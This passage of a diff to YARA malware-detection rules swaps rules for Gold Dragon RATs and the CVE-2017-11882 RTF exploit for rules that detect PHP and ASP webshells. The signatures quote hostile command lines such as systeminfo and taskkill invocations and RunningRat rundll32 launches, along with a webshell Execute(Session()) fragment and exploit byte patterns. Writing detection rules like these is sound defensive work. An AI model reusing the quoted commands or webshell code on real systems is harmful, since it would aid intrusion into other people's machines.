-		$x8 = { 64 41 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x9 = { 64 41 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x10 = { 64 41 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x11 = { 64 41 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x12 = { 64 7F 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x13 = { 64 41 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x14 = { 64 41 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x15 = { 64 41 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x16 = { 64 41 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x17 = { 64 41 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x18 = { 64 41 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x19 = { 64 41 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x20 = { 64 41 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x21 = { 64 41 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x22 = { 64 41 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x23 = { 64 7F 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x24 = { 64 41 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x25 = { 64 41 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x26 = { 6A 7F 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x27 = { 6A 7F 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x28 = { 6A 7F 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x29 = { 6A 7F 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x30 = { 6A 7F 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x31 = { 6A 7F 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x32 = { 6A 7F 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x33 = { 6A 7F 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x34 = { 64 7F 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x35 = { 6A 7F 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x36 = { 6A 7F 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x37 = { 6A 7F 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x38 = { 6A 7F 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x39 = { 6A 7F 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x40 = { 6A 7F 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x41 = { 6A 7F 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x42 = { 6A 7F 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x43 = { 6A 41 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x44 = { 6A 41 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x45 = { 64 7F 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x46 = { 6A 41 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x47 = { 6A 41 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x48 = { 6A 41 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x49 = { 6A 41 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x50 = { 6A 41 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x51 = { 6A 41 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x52 = { 6A 41 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x53 = { 6A 41 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x54 = { 6A 41 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x55 = { 6A 41 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x56 = { 64 7F 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x57 = { 6A 41 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x58 = { 6A 41 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x59 = { 6A 41 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x60 = { 6A 41 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x61 = { 64 7F 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x62 = { 64 7F 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x63 = { 64 7F 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x64 = { 64 7F 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$s0 = "@$rto=$_POST['rto'];" fullword
+		$s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword
+		$s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword
 
 	condition:
-		filesize > 50KB and filesize < 200KB and ( $s0 and 1 of ( $x* ) )
+		2 of them
 }
-
-rule SIGNATURE_BASE_Golddragon_Malware_Feb18_1 : FILE
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Dc3_Security_Crew_Shell_Priv_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Detects malware from Gold Dragon report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1da29f0f-4e83-56a0-b843-3b19d9b9a1b7"
-		date = "2018-02-03"
-		modified = "2023-12-05"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_golddragon.yar#L13-L29"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "d22c4cc3-842b-5a24-bf4b-a8024b447b9e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5431-L5447"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "873cf7aa18027615fe8c44140879811254229a238f7d426144fb7c1a6e07ea74"
-		score = 90
+		logic_hash = "7a4c74912caa1855efc3a2ea7fa6d0082f62776d77a211e59f12892d4883f240"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "433706fdc539238803fd47c4394b5109"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+
+	strings:
+		$s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":"
+		$s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "168c2f7752511dfd263a83d5d08a90db" or pe.imphash ( ) == "0606858bdeb129de33a2b095d7806e74" or pe.imphash ( ) == "51d992f5b9e01533eb1356323ed1cb0f" or pe.imphash ( ) == "bb801224abd8562f9ee8fb261b75e32a" )
+		all of them
 }
-rule SIGNATURE_BASE_Golddragon_Aux_File : FILE
+rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_1_C2007_Php_Php_C100_Php
 {
 	meta:
-		description = "Detects export from Gold Dragon - February 2018"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8f23dec4-e369-500f-a036-32df13e5543e"
-		date = "2018-02-03"
-		modified = "2023-12-05"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_golddragon.yar#L31-L44"
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5448-L5463"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4c5eb04cdafe3a69e584c64b833d8c6d21890660e92cc050bb29798dbcdf5326"
-		score = 90
+		logic_hash = "a5dc73a12d8c8b89bab77b90cb3b561e9daf9db5f5ad550326a2fbce52c1c8da"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash3 = "d089e7168373a0634e1ac18c0ee00085"
+		hash4 = "38fd7e45f9c11a37463c3ded1c76af4c"
 
 	strings:
-		$x1 = "/////////////////////regkeyenum////////////" ascii
+		$s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword
 
 	condition:
-		filesize < 500KB and 1 of them
+		all of them
 }
-
-rule SIGNATURE_BASE_Golddragon_Ghost419_RAT : FILE
+rule SIGNATURE_BASE_Multiple_Php_Webshells_2
 {
 	meta:
-		description = "Detects Ghost419 RAT from Gold Dragon report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8ac951d5-4a18-50c5-8ded-8a0a6b585fd6"
-		date = "2018-02-03"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/rW1yvZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_golddragon.yar#L46-L86"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5464-L5484"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b953c5e21c332add4ff3b8fef9d623904eb929b0e7fc86e6c7109cd81bc3819b"
+		logic_hash = "26fe586ba7f4d1931b2df81aa27543ff422e699fd56b6b1be289a0f8d6954691"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "45bfa1327c2c0118c152c7192ada429c6d4ae03b8164ebe36ab5ba9a84f5d7aa"
-		hash2 = "ee7a9a7589cbbcac8b6bf1a3d9c5d1c1ada98e68ac2f43ff93f768661b7e4a85"
-		hash3 = "dee482e5f461a8e531a6a7ea4728535aafdc4941a8939bc3c55f6cb28c46ad3d"
-		hash4 = "2df9e274ce0e71964aca4183cec01fb63566a907981a9e7384c0d73f86578fe4"
-		hash5 = "111ab6aa14ef1f8359c59b43778b76c7be5ca72dc1372a3603cd5814bfb2850d"
-		hash6 = "0ca12b78644f7e4141083dbb850acbacbebfd3cfa17a4849db844e3f7ef1bee5"
-		hash7 = "ae1b32aac4d8a35e2c62e334b794373c7457ebfaaab5e5e8e46f3928af07cde4"
-		hash8 = "c54837d0b856205bd4ae01887aae9178f55f16e0e1a1e1ff59bd18dbc8a3dd82"
-		hash9 = "db350bb43179f2a43a1330d82f3afeb900db5ff5094c2364d0767a3e6b97c854"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash6 = "09609851caa129e40b0d56e90dfc476c"
+		hash7 = "671cad517edd254352fe7e0c7c981c39"
 
 	strings:
-		$x2 = "WebKitFormBoundarywhpFxMBe19cSjFnG" ascii
-		$x3 = "\\Microsoft\\HNC\\" ascii
-		$x4 = "\\anternet abplorer" ascii
-		$x5 = "%s\\abxplore.exe" fullword ascii
-		$x6 = "GHOST419" fullword ascii
-		$x7 = "I,m Online. %04d - %02d - %02d - %02d - %02d" fullword ascii
-		$x8 = "//////////////////////////regkeyenum//////////////" ascii
-		$s0 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" fullword ascii
-		$s1 = "www.GoldDragon.com" fullword ascii
-		$s2 = "/c systeminfo >> %s" fullword ascii
-		$s3 = "/c dir %s\\ >> %s" fullword ascii
-		$s4 = "DownLoading %02x, %02x, %02x" fullword ascii
-		$s5 = "Tran_dll.dll" fullword ascii
-		$s6 = "MpCmdRunkr.dll" fullword ascii
-		$s7 = "MpCmdRun.dll" fullword ascii
+		$s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I"
+		$s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma"
+		$s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( ( pe.exports ( "ExportFunction" ) and pe.number_of_exports == 1 ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) or 3 of them )
+		all of them
 }
-
-rule SIGNATURE_BASE_Golddragon_Runningrat : FILE
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_1_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Detects Running RAT from Gold Dragon report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7de93103-46a5-5aba-90cf-26735a6a580e"
-		date = "2018-02-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/rW1yvZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_golddragon.yar#L88-L128"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "4915146e-141c-5515-ac5a-61901d42dc40"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5485-L5503"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "02b0ac613bb01cb5bbe947661880070790bbb7c6ba9925e70bc200df34747a0b"
+		logic_hash = "160adf93d4f9e51022c427b2b0601207dd9ca917e98d99e2013fe83e09a85d21"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88"
-		hash2 = "2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863"
-		hash3 = "7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$x1 = "C:\\USERS\\WIN7_x64\\result.log" fullword wide
-		$x2 = "rundll32.exe %s RunningRat" fullword ascii
-		$x3 = "SystemRat.dll" fullword ascii
-		$x4 = "rundll32.exe %s ExportFunction" fullword ascii
-		$x5 = "rundll32.exe \"%s\" RunningRat" fullword ascii
-		$x6 = "ixeorat.bin" fullword ascii
-		$x7 = "C:\\USERS\\Public\\result.log" fullword ascii
-		$a1 = "emanybtsohteg" fullword ascii
-		$a2 = "tekcosesolc" fullword ascii
-		$a3 = "emankcosteg" fullword ascii
-		$a4 = "emantsohteg" fullword ascii
-		$a5 = "tpokcostes" fullword ascii
-		$a6 = "putratSASW" fullword ascii
-		$s1 = "ParentDll.dll" fullword ascii
-		$s2 = "MR - Already Existed" fullword ascii
-		$s3 = "MR First Started, Registed OK!" fullword ascii
-		$s4 = "RM-M : LoadResource OK!" fullword ascii
-		$s5 = "D:\\result.log" fullword ascii
+		$s0 = "if ($total === FALSE) {$total = 0;}" fullword
+		$s1 = "$free_percent = round(100/($total/$free),2);" fullword
+		$s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword
+		$s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "c78ccc8f02286648c4373d3bf03efc43" or pe.exports ( "RunningRat" ) or 1 of ( $x* ) or 5 of ( $a* ) or 3 of ( $s* ) )
+		2 of them
 }
-rule SIGNATURE_BASE_Golddragon_Runnignrat : FILE
+rule SIGNATURE_BASE__R577_Php_Php_R57_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Detects Running RAT malware from Gold Dragon report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b99b89a4-a764-5d72-8360-8e53461267d9"
-		date = "2018-02-03"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/rW1yvZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_golddragon.yar#L130-L154"
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "022d2255-50cd-500b-8d91-8e34f3c46fcf"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5504-L5520"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5bcc2ebbd54c31cf418430149eb558e8e26355161d0b53f403e7dfd2e1707baa"
+		logic_hash = "7ba3d6927dc06bfcd98ee9d7146164ca9a9024ef26eac60fabc8ed1375db618d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "94aa827a514d7aa70c404ec326edaaad4b2b738ffaea5a66c0c9f246738df579"
-		hash2 = "5cbc07895d099ce39a3142025c557b7fac41d79914535ab7ffc2094809f12a4b"
-		hash3 = "98ccf3a463b81a47fdf4275e228a8f2266e613e08baae8bdcd098e49851ed49a"
+		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash3 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$s1 = "cmd.exe /c systeminfo " fullword ascii
-		$s2 = "ieproxy.dll" fullword ascii
-		$s3 = "taskkill /f /im daumcleaner.exe" fullword ascii
-		$s4 = "cmd.exe /c tasklist " fullword ascii
-		$s5 = "rundll32.exe \"%s\" Run" fullword ascii
-		$s6 = "Mozilla/5.0 (Windows NT 5.2; rv:12.0) Gecko/20100101 Firefox/12.0" fullword ascii
-		$s7 = "%s\\%s_%03d" fullword wide
-		$s8 = "\\PI_001.dat" ascii
+		$s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword
+		$s2 = "'eng_text30'=>'Cat file'," fullword
+		$s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 3 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Rtf_Cve2017_11882_Ole : MALICIOUS EXPLOIT CVE_2017_11882
+rule SIGNATURE_BASE__Nixrem_Php_Php_C99Shell_V1_0_Php_Php_C99Php_NIX_REMOTE_WEB_SHELL_V_0_5_Alpha_Lite_Public_Version_Php
 {
 	meta:
-		description = "Attempts to identify the exploit CVE 2017 11882"
-		author = "John Davison"
-		id = "b6c59cf1-52e4-5c9e-b3c3-d973d52736e3"
-		date = "2017-11-23"
-		modified = "2025-06-03"
-		reference = "https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_11882.yar#L1-L17"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5521-L5538"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "51cf2a6c0c1a29abca9fd13cb22421da"
-		logic_hash = "6856d3c78cc06899d2bc1f876dce6b718513ebad80f37d7b5914a14d1da5064c"
-		score = 60
+		logic_hash = "f7575db2c8f147d03d5b93b431d1a73c4182b5db6e801e672914778b2042a712"
+		score = 75
 		quality = 85
-		tags = "MALICIOUS, EXPLOIT, CVE_2017_11882"
+		tags = ""
+		super_rule = 1
+		hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6"
+		hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash3 = "f3ca29b7999643507081caab926e2e74"
 
 	strings:
-		$headers = { 1c 00 00 00 02 00 ?? ?? a9 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 01 01 03 ?? }
-		$font = { 0a 01 08 5a 5a }
-		$winexec = { 12 0c 43 00 }
+		$s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword
+		$s1 = "$ret = posix_kill($pid,$sig);" fullword
+		$s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword
+		$s3 = "$i = $nixpasswd;" fullword
 
 	condition:
-		all of them and @font > @headers and @winexec == @font + 5 + 44
+		2 of them
 }
-rule SIGNATURE_BASE_Rtf_Cve2017_11882 : MALICIOUS EXPLOIT CVE_2017_1182
+rule SIGNATURE_BASE_Darksecurityteam_Webshell
 {
 	meta:
-		description = "Attempts to identify the exploit CVE 2017 11882"
-		author = "John Davison"
-		id = "b6c59cf1-52e4-5c9e-b3c3-d973d52736e3"
-		date = "2017-11-23"
-		modified = "2025-06-03"
-		reference = "https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_11882.yar#L20-L39"
+		description = "Dark Security Team Webshell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "78dcd62f-9215-5571-a5ef-5f811ce9672f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5542-L5554"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "51cf2a6c0c1a29abca9fd13cb22421da"
-		logic_hash = "37a65f086d393aae3dc88b3dd2520fff6e96b92fd6ae1be0a110f4eb826ae12d"
-		score = 60
-		quality = 81
-		tags = "MALICIOUS, EXPLOIT, CVE_2017_1182"
+		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
+		logic_hash = "0c58ed8845cb04d785322b280647d424e1028a3be7e92b2493fd907fae36b16d"
+		score = 50
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$headers = { 31 63 30 30 30 30 30 30  30 32 30 30 ?? ?? ?? ??
-                     61 39 30 30 30 30 30 30  ?? ?? ?? ?? ?? ?? ?? ??
-                     ?? ?? ?? ?? ?? ?? ?? ??  ?? ?? ?? ?? ?? ?? ?? ??
-                     ?? ?? ?? ?? ?? ?? ?? ??  30 33 30 31 30 31 30 33
-                     ?? ?? }
-		$font = { 30 61 30 31 30 38 35 61  35 61 }
-		$winexec = { 31 32 30 63 34 33 30 30 }
+		$s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii
 
 	condition:
-		all of them and @font > @headers and @winexec == @font + ( ( 5 + 44 ) * 2 )
+		1 of them
 }
-rule SIGNATURE_BASE_Packager_Cve2017_11882 : CVE_2017_11882 FILE
+rule SIGNATURE_BASE_PHP_Cloaked_Webshell_Superfetchexec
 {
 	meta:
-		description = "Attempts to exploit CVE-2017-11882 using Packager"
-		author = "Rich Warren"
-		id = "57ff395e-e56a-5e63-bde6-f3cef038fcd6"
-		date = "2017-11-23"
-		modified = "2025-06-03"
-		reference = "https://github.com/rxwx/CVE-2017-11882/blob/master/packager_exec_CVE-2017-11882.py"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_11882.yar#L41-L56"
+		description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4611129a-9865-5603-b1ec-7db0058a80d7"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "http://goo.gl/xFvioC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5556-L5568"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "94e0c70e8140bb7fa3d184447617b534a8b9a24cdad535e6818be9662f0b9144"
-		score = 60
-		quality = 54
-		tags = "CVE-2017-11882, FILE"
+		logic_hash = "320b85b1ad39a90578f53c69838b6264af1e6a71c509aefc0986c7f0c77fdae9"
+		score = 50
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$font = { 30 61 30 31 30 38 35 61  35 61 }
-		$equation = { 45 71 75 61 74 69 6F 6E 2E 33 }
